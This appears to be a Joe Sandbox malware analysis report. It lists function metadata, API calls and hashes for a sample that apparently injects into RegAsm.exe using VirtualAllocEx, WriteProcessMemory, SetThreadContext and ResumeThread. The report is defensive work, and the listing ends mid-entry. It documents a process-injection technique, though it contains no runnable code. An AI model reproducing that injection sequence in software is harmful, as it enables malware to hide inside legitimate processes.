Function 02FA2D5C Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 02FA488D

Memory Dump Source

Source File: 00000002.00000002.2079267638.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fa0000_temp_executable.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 9ea36d19c30ad168dfe84561a7f0fdf9deda515447e09a177f109fb18519e9cc
Instruction ID: 6499f3aac4b35b54a77879a44e552b64e238944f179ff1bf32479043befb031c
Opcode Fuzzy Hash: 9ea36d19c30ad168dfe84561a7f0fdf9deda515447e09a177f109fb18519e9cc
Instruction Fuzzy Hash: 102105B19103999FCB10DF9AD885BDEBBF5FF48310F108429E918A7350D779A940CBA4

Function 02FA4670 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,00010002), ref: 02FA46F7

Memory Dump Source

Source File: 00000002.00000002.2079267638.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fa0000_temp_executable.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 383631f4e045198a9f0d9e2000a85bce0d9ba7e49147b634ce53c193cc137b83
Instruction ID: 7d825055c19b51c0150618c042dfd72d4a5caf2e936ddae084e5e006ef8a71ce
Opcode Fuzzy Hash: 383631f4e045198a9f0d9e2000a85bce0d9ba7e49147b634ce53c193cc137b83
Instruction Fuzzy Hash: 0921E0B59003499FCB10CFAAD884ADEBBF5FF49310F10842AE918A7250D779A944CFA5

Function 02FA2D38 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,00010002), ref: 02FA46F7

Memory Dump Source

Source File: 00000002.00000002.2079267638.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fa0000_temp_executable.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 39e22f9726c0b5aa167f3e7a7cca4c8d9857d40766ba66687bb51e5b16468028
Instruction ID: b8ce9382a03508dfcbed17668b5eae8d4d743b59c6047c38f16192b22cc7d95c
Opcode Fuzzy Hash: 39e22f9726c0b5aa167f3e7a7cca4c8d9857d40766ba66687bb51e5b16468028
Instruction Fuzzy Hash: 2321E0B59002599FCB10DF9AD884ADEBBF5FB48310F10842AEA18A7350D779A944CBA4

Function 02FA45A8 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(0322816C,00000000), ref: 02FA4627

Memory Dump Source

Source File: 00000002.00000002.2079267638.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fa0000_temp_executable.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: fc4e1d09cf1c97c7feacaeec974a535d5e63106603c5328642334be74fb88ac8
Instruction ID: 0e0f4244191f66a3b606dddf36480b5a39bbf938e14789570e73896d24cff4bf
Opcode Fuzzy Hash: fc4e1d09cf1c97c7feacaeec974a535d5e63106603c5328642334be74fb88ac8
Instruction Fuzzy Hash: 312135B1D1025A9FCB10CF9AC4847AEFBF4FB48214F14812AD518B7340D778A9448FA0

Function 02FA2D68 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(0322816C,00000000), ref: 02FA4627

Memory Dump Source

Source File: 00000002.00000002.2079267638.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fa0000_temp_executable.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 068988e082a3a06c5ac6fde6b5b2d7c6072b6e5df233dc959f6a6963d5cb49ec
Instruction ID: fdf7fa31e7b8a8ac3ce413f7fad59e8bca49c97fd8ca49c109a2e4ed34fdef93
Opcode Fuzzy Hash: 068988e082a3a06c5ac6fde6b5b2d7c6072b6e5df233dc959f6a6963d5cb49ec
Instruction Fuzzy Hash: 4A2113B1D106199FCB10DF9AC545BAEFBF4FB48620F14816AE918B7340D3B8A9448FA5

Function 02FA2D20 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(0322816C,00000000), ref: 02FA4627

Memory Dump Source

Source File: 00000002.00000002.2079267638.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fa0000_temp_executable.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 68dce855e544e655c8470df63a8c320870616db25bda5b6ca295963558eff6b8
Instruction ID: 72f6fae74e92a961d0e1aed2ccd3bc61b8fe919a04bfcdba8da08698f38e1e05
Opcode Fuzzy Hash: 68dce855e544e655c8470df63a8c320870616db25bda5b6ca295963558eff6b8
Instruction Fuzzy Hash: 852113B1D106599FCB10DF9AC545BAEFBF4FB48620F14816AE918B7340D3B8A944CFA1

Function 02FA4740 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,00010002), ref: 02FA47B3

Memory Dump Source

Source File: 00000002.00000002.2079267638.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fa0000_temp_executable.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1adc251f877591f4945ebb5fd90ac20269091ba78ce740fb63143e18ef622a55
Instruction ID: 7efe783eb067139ea54bfe8a4624c5025ac2dcd54714ce43eb40c326f03b8ae8
Opcode Fuzzy Hash: 1adc251f877591f4945ebb5fd90ac20269091ba78ce740fb63143e18ef622a55
Instruction Fuzzy Hash: 0D1134B59002499FDB10DF9AC884BDEBFF9EF49324F208419EA18A7250C775A944CFA0

Function 02FA2D50 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,00010002), ref: 02FA47B3

Memory Dump Source

Source File: 00000002.00000002.2079267638.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fa0000_temp_executable.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 70871e47dce96f023802f7f020caedbfedcc68bdf2d57493cf7659c25f1996ed
Instruction ID: c813e3b7aaf39b9fb876761604c824565046b2d855258bc9962c49144c47e322
Opcode Fuzzy Hash: 70871e47dce96f023802f7f020caedbfedcc68bdf2d57493cf7659c25f1996ed
Instruction Fuzzy Hash: 9311F3B59002499FDB20DF9AC888BDEBBF5EB89324F108419E619A7250D775A940CFA1

Function 02FA48DB Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(0322816C), ref: 02FA493F

Memory Dump Source

Source File: 00000002.00000002.2079267638.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fa0000_temp_executable.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 16a11b87acdb3eb979d67a57dc4ca3c2dd4cb990ea6804f698ca514a826244dd
Instruction ID: 25932bb80e8bfe4bd0e3dd8f9a265fd472accf17fcfb53c235dbdbfe752fc836
Opcode Fuzzy Hash: 16a11b87acdb3eb979d67a57dc4ca3c2dd4cb990ea6804f698ca514a826244dd
Instruction Fuzzy Hash: 8D1136B19002498FDB10DF9AC449B9EFBF8FF49324F208459D518A7350C7B9A944CFA5

Function 02FA2D80 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(0322816C), ref: 02FA493F

Memory Dump Source

Source File: 00000002.00000002.2079267638.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fa0000_temp_executable.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a22dabb0b44bcdecba7635b5528016f0b7a54b7cee95934412a7ad6bd964e9f2
Instruction ID: a206aae27f33a386c8cf0c5e8b1bf433fc29214d197f0132c13fb8c162319358
Opcode Fuzzy Hash: a22dabb0b44bcdecba7635b5528016f0b7a54b7cee95934412a7ad6bd964e9f2
Instruction Fuzzy Hash: 221125B19002498FDB20DF9AD449B9EFBF8FF49324F208459D518A7350C7B9A944CFA5

Function 0171D76D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2078968167.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_171d000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2196d8186f74860ba01d318dd96c467a276eedcf7bf578ae29e7efad73d366d8
Instruction ID: 1daab9baca43e82ebca66d2905249e3066611baf8c35ab67e7bdee4e8567d590
Opcode Fuzzy Hash: 2196d8186f74860ba01d318dd96c467a276eedcf7bf578ae29e7efad73d366d8
Instruction Fuzzy Hash: 5901D6311047849AE7318BADDD88B67FFDCEF55334F18C46AED090A28AC2799840CE71

Function 0171D76C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2078968167.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_171d000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45e55e0304e5e809d3ab521054d5e7cfeadeca406c630314d2f55456228977b1
Instruction ID: 1afb1d5a2fce3ff3cfc649cc762a42c115ad99c3457eb7e105951775e22a1f29
Opcode Fuzzy Hash: 45e55e0304e5e809d3ab521054d5e7cfeadeca406c630314d2f55456228977b1
Instruction Fuzzy Hash: DBF096714043849EE7218F1EDCC8B62FFD8EF55735F18C45AED484B68AC2799844CA71

Non-executed Functions

Function 02FA354B Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2079267638.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fa0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49061d20399a53262053cd6a754257191b7e6a4c6ab5f09ed52f523ca2cb047e
Instruction ID: 3a5a9dc262fa25d462657b573b264ae2bd5285f12f38843c8b65247a283ecde6
Opcode Fuzzy Hash: 49061d20399a53262053cd6a754257191b7e6a4c6ab5f09ed52f523ca2cb047e
Instruction Fuzzy Hash: F821A9B1D056188BEB68CF6B89157DAFAF6BFC9300F14C1BAC508A6255DB740985CF50

Analysis Process: RegAsm.exePID: 6648, Parent PID: 5620COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	5.3%
Signature Coverage:	9.6%
Total number of Nodes:	94
Total number of Limit Nodes:	8

Executed Functions

Function 00417663 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176D5

Memory Dump Source

Source File: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: ddb6e7506c6e67887ebc9e0bc13429d94af2d16605d59da66af83c1694b8c914
Instruction ID: d3f44e460cc280bd8e551566dc012685ef73f4a32ffc8664677e37c5d98fc3a0
Opcode Fuzzy Hash: ddb6e7506c6e67887ebc9e0bc13429d94af2d16605d59da66af83c1694b8c914
Instruction Fuzzy Hash: 26015EB1E0020DBBDB10DBE5DC42FDEB7789B14308F4081AAE90897241FA34EB488B95

Function 0042C563 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C597

Memory Dump Source

Source File: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 96f056240fafe685daf6fa55bc1be0920503d8e12ced685b7f3f31ef0593642a
Instruction ID: 1d949b529eabaabdef27e6558712febaa9fe5fb270f3c28a710670586d94b21d
Opcode Fuzzy Hash: 96f056240fafe685daf6fa55bc1be0920503d8e12ced685b7f3f31ef0593642a
Instruction Fuzzy Hash: 6AE04F766042147BD610FA5ADC01F9B77ACDFC5714F40441AFE0867141C675791186A4

Function 02CC35C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02CC35CA

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2986e712d6ba7404c80865ed9719dfa08c53aceaa4ea8a8bdade37664ca6b549
Instruction ID: 0e1c543f99ee67648cb11e9fb5aad573f0b7580d01fa79f81119aacc8df76d52
Opcode Fuzzy Hash: 2986e712d6ba7404c80865ed9719dfa08c53aceaa4ea8a8bdade37664ca6b549
Instruction Fuzzy Hash: 3490027564551402D10071584514707101587D0601F65C511A1464568D87958A5265A2

Function 02CC2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02CC2C7A

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6921f74b831468e96707659d81045105a22c04c25d4f1582eb653dbdf6cd547c
Instruction ID: 300d7aee18a0d66a5778742359c14f9e81f5f4a42e341acd9a1764eefa0d3dfd
Opcode Fuzzy Hash: 6921f74b831468e96707659d81045105a22c04c25d4f1582eb653dbdf6cd547c
Instruction Fuzzy Hash: 0290027524149802D1107158840474B001587D0701F59C511A5464658D869589927121

Function 02CC2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02CC2DFA

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bb10afcba9858fd180dda32c03188dc9e9672a0b6ccd8ca9eb973cb61897e579
Instruction ID: 0b308cba66867e50e6126b1fb070ec488c1ec216c7fa5e01f86a3730fafc057d
Opcode Fuzzy Hash: bb10afcba9858fd180dda32c03188dc9e9672a0b6ccd8ca9eb973cb61897e579
Instruction Fuzzy Hash: 1890027524141413D11171584504707001987D0641F95C512A1464558D96568A53A121

Function 0042C8D3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,33F133F3,00000007,00000000,00000004,00000000,00416EEC,000000F4), ref: 0042C90F

Memory Dump Source

Source File: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ceab812759e8158de5a5ac84d472db0a12d41cfdbf74905a48891567a58fb3ad
Instruction ID: a1d5e44e419c5f43a953c6024c3edd79cc08c06400655d89eb787496dd1df9ae
Opcode Fuzzy Hash: ceab812759e8158de5a5ac84d472db0a12d41cfdbf74905a48891567a58fb3ad
Instruction Fuzzy Hash: 70E06DB56042047BD610EE59DC41E9B77ACDFC9714F004419FA08A7241CA74B9108BB4

Function 0042C883 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E484,?,?,00000000,?,0041E484,?,?,?), ref: 0042C8C2

Memory Dump Source

Source File: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fcfa1a01d57513169263ffc7a4ff84fc11524f1f96e112cbaab84027832a42ee
Instruction ID: b590f83acaf36a29023c807d359efb1fd208aa40abbca26474ac6304e8d45e96
Opcode Fuzzy Hash: fcfa1a01d57513169263ffc7a4ff84fc11524f1f96e112cbaab84027832a42ee
Instruction Fuzzy Hash: 5FE06DB56042047BCA10EE99EC41E9B73ACDFC4714F00441AFA08B7241D674B9108AB4

Function 0042C923 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?), ref: 0042C957

Memory Dump Source

Source File: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 3dd16e71390a05461ac9c330b6713ed5c034b65982e4cb0efbd5251f43070572
Instruction ID: 974abf2e9af91e9e83b3f33a5918f389266a5b4bdd13027a746a45c35a0aad57
Opcode Fuzzy Hash: 3dd16e71390a05461ac9c330b6713ed5c034b65982e4cb0efbd5251f43070572
Instruction Fuzzy Hash: 0AE026353102007BD510FA5ADC01F97775CDFC5710F400419FA487B242C671790083F1

Function 00417656 Relevance: 1.5, APIs: 1, Instructions: 24
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176D5

Memory Dump Source

Source File: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 28aa7e2d02eedffb485acc23daf37528fc48007df721c371ca5d5e4060a106f8
Instruction ID: cf65e461030a38222c57f55313a0619b2327d6594293c5b5006fcba462ae1fac
Opcode Fuzzy Hash: 28aa7e2d02eedffb485acc23daf37528fc48007df721c371ca5d5e4060a106f8
Instruction Fuzzy Hash: 42E048B5E0410AABDF00CF98CC41F9EB7B8AB54304F008196E84CD6241F574F659C755

Function 02CC2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02CC2C24

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e08bbdaf3fb55aada47bef578969e3749a4260c75386ae08a4e255a06c58f43e
Instruction ID: cc24721925a6a1809e49dc88cbd4516a3f78631314ad025cf306d60be92e22d6
Opcode Fuzzy Hash: e08bbdaf3fb55aada47bef578969e3749a4260c75386ae08a4e255a06c58f43e
Instruction Fuzzy Hash: 8CB09B719419D5C5EA11E7608A08717791067D0701F25C165D3074641E4738C1D1E176

Non-executed Functions

Function 02D02349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

@, xrefs: 02D02B74
GlobalFlag2, xrefs: 02D02FC0
MaxLoaderThreads, xrefs: 02D024EC
GlobalFlag, xrefs: 02D02F3F, 02D03059
MaxDeadActivationContexts, xrefs: 02D02D82
ExecuteOptions, xrefs: 02D025A0
Initializing the application verifier package failed with status 0x%08lx, xrefs: 02D03176
RaiseExceptionOnPossibleDeadlock, xrefs: 02D02579
LdrpInitializeExecutionOptions, xrefs: 02D0317D
@, xrefs: 02D02942
TracingFlags, xrefs: 02D02549
ShutdownFlags, xrefs: 02D024A1
UnloadEventTraceDepth, xrefs: 02D024C0
FrontEndHeapDebugOptions, xrefs: 02D02489
MinimumStackCommitInBytes, xrefs: 02D02BB0
DisableHeapLookaside, xrefs: 02D0246D
UseImpersonatedDeviceMap, xrefs: 02D0251C
DisableExceptionChainValidation, xrefs: 02D0275F
CFGOptions, xrefs: 02D02967
minkernel\ntdll\ldrinit.c, xrefs: 02D03187

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 0e22167d1550555f41c875efc7ffc50b2d2e5e0f0aa2b41e17705579bf28ab40
Instruction ID: 2cd43c93c51fa38ab0046ac21ff284b7a31bb11dd07e530e87fa5a6c517468f4
Opcode Fuzzy Hash: 0e22167d1550555f41c875efc7ffc50b2d2e5e0f0aa2b41e17705579bf28ab40
Instruction Fuzzy Hash: 16929C71609781ABE721CE24C8C8B6BB7E9BB84754F14492DFA85D73A0D770EC44CB92

Function 02CB8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

corrupted critical section, xrefs: 02CF54C2
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02CF54E2
Critical section address, xrefs: 02CF5425, 02CF54BC, 02CF5534
double initialized or corrupted critical section, xrefs: 02CF5508
Critical section debug info address, xrefs: 02CF541F, 02CF552E
8, xrefs: 02CF52E3
undeleted critical section in freed memory, xrefs: 02CF542B
Address of the debug info found in the active list., xrefs: 02CF54AE, 02CF54FA
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02CF540A, 02CF5496, 02CF5519
Thread is in a state in which it cannot own a critical section, xrefs: 02CF5543
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02CF54CE
Thread identifier, xrefs: 02CF553A
Critical section address., xrefs: 02CF5502
Invalid debug info address of this critical section, xrefs: 02CF54B6

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: bd8c937d67e6101ef68ea4194a79463e886c78691937b2744ee6b650b312c7c8
Instruction ID: 40ffc5500361ef354119ca0a997a88c8f55330a1b04dd558ab34fcabcd183813
Opcode Fuzzy Hash: bd8c937d67e6101ef68ea4194a79463e886c78691937b2744ee6b650b312c7c8
Instruction Fuzzy Hash: 3281B2B1A40348EFEB60CF95C884BAEBBB9FF48714F544229F609B7640D375A945CB50

Function 02D312ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

Heap block at %p has corrupted PreviousSize (%lx), xrefs: 02D3176D
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 02D3186B
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 02D318A5
HEAP: , xrefs: 02D31706, 02D31756, 02D317A8, 02D31809, 02D3184D, 02D31895, 02D318E6
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 02D318F8
Heap block at %p is not last block in segment (%p), xrefs: 02D317B7
Heap block at %p has incorrect segment offset (%x), xrefs: 02D3181A
HEAP[%wZ]: , xrefs: 02D316CD, 02D316F9, 02D31749, 02D3179B, 02D317FC, 02D31840, 02D318D9
Free Heap block %p modified at %p after it was freed, xrefs: 02D3171B

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: b89ba028a23d9055e93f397d83e0e85b36fb1f4df89b728572c54648cd2c0f43
Instruction ID: 9033eaf2e8901be916b96d4f9754387bb7215499b656bcc1c9a5b355fc0eac2f
Opcode Fuzzy Hash: b89ba028a23d9055e93f397d83e0e85b36fb1f4df89b728572c54648cd2c0f43
Instruction Fuzzy Hash: 99127A71600642EFDB268F68C445BBABBF6EF09718F188459E4DA8B741D734EC81DB90

Function 02C7D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

PreferredUILanguagesPending, xrefs: 02CDA8DE
Control Panel\Desktop\MuiCached, xrefs: 02C7D62B
@, xrefs: 02C7D663
Control Panel\Desktop, xrefs: 02C7D45D
@, xrefs: 02C7D49D
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 02C7D3B6
MachinePreferredUILanguages, xrefs: 02C7D685
PreferredUILanguages, xrefs: 02C7D4B8, 02C7D4C5
@, xrefs: 02C7D3E9

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: c4e1a494910245b9fadf25a1734fcd4f841589cba52fe48df9062b77ba2341af
Instruction ID: 765d0d8bc2bd3fc17568f3d0d4e2b9eb231a90ef533eeaf2ba4de884db5e2cfe
Opcode Fuzzy Hash: c4e1a494910245b9fadf25a1734fcd4f841589cba52fe48df9062b77ba2341af
Instruction Fuzzy Hash: D7B19CB25083519FC725DF25C880B6BBBE9AFC8758F05492EF98AD7240D730DA45CB92

Function 02D19179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

